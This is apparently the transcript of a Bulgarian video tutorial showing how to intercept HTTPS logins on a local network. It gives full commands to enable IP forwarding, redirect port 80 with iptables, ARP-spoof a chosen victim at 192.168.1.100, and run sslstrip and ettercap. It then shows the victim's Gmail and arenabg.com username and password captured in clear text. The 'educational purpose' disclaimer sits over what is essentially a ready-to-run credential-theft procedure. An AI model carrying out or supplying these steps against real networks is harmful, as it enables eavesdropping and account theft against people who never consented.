Здравейте отново от мен Мартин Петров и както винаги тази видео демонстрация е създадена с учебна цел. Авторът не носи отговорност за потенциални щети нанесени от демонстрацията.
Сега ще ви демонстрирам как можете да подслушвате SSL връзки или SSL Hijachking чрез sslstrip от Moxie Marlinspike.
Преди всичко трябва да сканираме своята мрежа и да си изберем потребител на които ще подслушваме SSL връзката.
Отваряме терминал едно и сканираме нашата мрежа
Избираме потребител с IP адрес 192.168.1.100
Сега ще се подготвим за нашият SSL Hijacking като отварим терминал 1 и редактираме /etc/etter.conf
Позволяваме форвардинг
echo 1 > /proc/sys/net/ipv4/ip_forward
Сега пренасочваме порт 80 към 10 000 с iptables
iptables -t nat -A PREROUTNIG -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Сега изпълняваме arp спуфинг
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
В терминал две стартираме sslstrip с аргумент -a -k -f
sslstrip -a -k -f
И в терминал 3 стартираме ettercap за да видим резултата от всичко това :)
ettercap -T -q -i eth0
Хайде сега да наблюдаваме машината на потребителя
Сега потребителят ще отвори сайт с криптирана връзка HTTPS. Например gmail: https://mail.google.com
Въвежда примерно потребителско име и парола
Ще погледнем ettercap в нашата машина. Виждаме потребителското име и паролата които потребителя въведе по- рано. Всичко се вижда в чист текст като се има впредвид, че връзката беше реализирана чрез https.
По същия начин могат да се прослушват и нормални връзки към страници работещи на 80-ти порт.
Сега потребителя ще отвори уеб сайта arenabg.com и ще въведе примерно потребителско име и парола
Отново виждаме потребителското име и парола.
Видео демонстрация SSL Hijacking:
1. Видео демонстрация качена във vbox
2. Видео демонстрация качена във youtube